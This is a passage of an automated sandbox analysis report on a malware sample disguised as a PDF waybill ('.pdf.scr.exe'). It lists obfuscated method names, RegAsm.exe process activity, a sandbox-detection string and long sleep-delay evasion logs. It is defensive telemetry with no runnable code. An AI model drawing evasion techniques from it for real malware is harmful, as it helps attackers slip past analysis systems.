                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.5ce0000.12.raw.unpack, sMn0sGRZ6wZsIITGQs0.csHigh entropy of concatenated method names: 'va3R6DaB3E', 'BKDRjqu05U', 'aylRCX0cB4', 'yOORmmx9Yt', 'NK4RM26Hvs', 'UcgRbmoGET', 'CpyR4R039D', 'vmcREATagd', 'sxjRqsMa6U', 'iN8RgVPX8D'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, KGTM4RSuoUilCOP75I.csHigh entropy of concatenated method names: 'cXIOt4P8f', 'LMRlUqhlw', 'Equals', 'GetHashCode', 'jdUKj695N', 'ToString', 'K2tEgjJjnO23Nm7ZCmh', 'MHluOJJytbWcViPKxWb', 'Equals', 'GetHashCode'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, FHbbZfNkvuhlgnZTihu.csHigh entropy of concatenated method names: 'ztDm8x2DM4EorebHOLV', 'DsnqaH2wP7d50qGF7wi', 'UiBsiv5HnZ', 'vh0ry9Sq2v', 'axtspFjRP3', 'vhks3GQqJ1', 'fvJs4yVVGN', 'QvbsSRc6DF', 'Bvapa8tr27', 'b9RNZAdRGs'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, ODQgSbggtaZVNNhIgQy.csHigh entropy of concatenated method names: 'IdyFxsCSrh', 'R82Fg9xkyK', 'C8uFYRxqXr', 'A8EFsRKDSk', 'Q2gFeeAw7p', 'rvpF2LEaVS', 'LZfC0yePnElE1fCpTnk', 'bK4qXieDMuLjec1N8CP', 'WFygiKgZ3n', 'auMgNBD28U'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, LwCliNsTgeSduSMNPv8.csHigh entropy of concatenated method names: 'VDfs1bFY1j', 'pG4sGuZXGE', 'papsVkOO4s', 'uA9sPQfEvM', 'ppssD47oo6', 'wupswRUluK', 'nbWs0fal7h', 'A9SsCWdoZx', 'mZDsapprhA', 't8ustKrSV0'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, k1cJuk8QZEUjq6lAlR.csHigh entropy of concatenated method names: 'sLWxhtQj6Q', 'UjZxdKjSE1', 'SDc6tde4hh72SwRFBKt', 'ckCoBOeSD0ZX7RU4xQb', 'wl1xqAIj24', 'SPGxkrPaQ1', 'leLxlwq2He', 'HLSxGhmTjo', 'c2FxVtny8v', 'JJ6xDFhE7g'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, MozilSpeed.csHigh entropy of concatenated method names: 'hhAF8hoipS', 'sHrFIL4Uoo', 'ubTFQVnWjI', 'lqXF9jlbA8', 'yTxFzDuWst', 'OpsiUdQBAV', 'rEWP7n2JdVO97etDmnc', 'F8veVv2e8ZhEm1cPHyY', 'HqAiYrLtRn', 'sakisVTKZs'
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: AWB_3570456515#U00b7PDF.scr.exe PID: 7260, type: MEMORYSTR
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory allocated: A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeMemory allocated: 43D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 6D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 598063Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597843Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597621Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597297Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596844Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596734Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596625Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596516Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596406Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596297Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596188Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 596063Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595938Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595813Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595702Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595592Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595455Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeThread delayed: delay time: 595328Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeWindow / User API: threadDelayed 8288Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeWindow / User API: threadDelayed 1551Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep count: 41 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7324Thread sleep count: 8288 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7324Thread sleep count: 1551 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -99765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -99541s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -99437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -99328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -99183s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -99078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -98969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -98859s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -98750s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -98626s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -98500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -98390s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -98281s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -98171s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -98060s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -97948s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -97813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -97703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -97593s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -97470s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -598063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -597953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -597843s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -597734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -597621s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -597516s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -597406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -597297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -597187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -597078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -596969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -596844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -596734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -596625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -596516s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -596406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -596297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -596188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -596063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -595938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -595813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe TID: 7292Thread sleep time: -595702s >= -30000sJump to behavior
